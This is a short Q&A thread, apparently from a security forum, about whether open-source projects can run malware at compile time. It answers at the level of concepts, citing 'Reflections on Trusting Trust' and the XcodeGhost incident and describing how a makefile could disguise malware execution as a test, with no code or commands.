Compile time malware possible?

Question

Is it possible for let's say open source programs to install malware at compile time? I'm thinking of C macros or makefile related stuff that will execute evil code at compile time. Or am I safe as long as I don't start running the compiled program?

Answer 1

Not only is it possible for configure or make scripts to install malicious code at compile time, but the compiler or build tools could be modified to inject a backdoor or other malicious code into the compiled binaries. That is, even though the code you're building appears clean, the build tools could 'go rogue' and introduce malicious code.

This concept of malicious compilers was famously presented by a paper titled 'Reflections on Trusting Trust'[1]. Recently, malware was discovered in iOS apps that was injected using this technique by attacking developers' compilers (Xcode) [2].

bottom line: Unless you've written or reviewed every line of code from the project you're building, the tools your using to build it, and the OS/firmware you're building it on, you can't fully trust it.

[1] https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf

[2] http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/

Answer 2

Consider that the makefile is essentially just a list of commands to run. So take for example the idea that you could distribute malware source code in a makefile project. Then when you build the project, the makefile goes and compiles the malware... and then at the end, executes the newly-compiled malware -- say for example pretending to run a unit test on what you think is not malware.

It's certainly possible.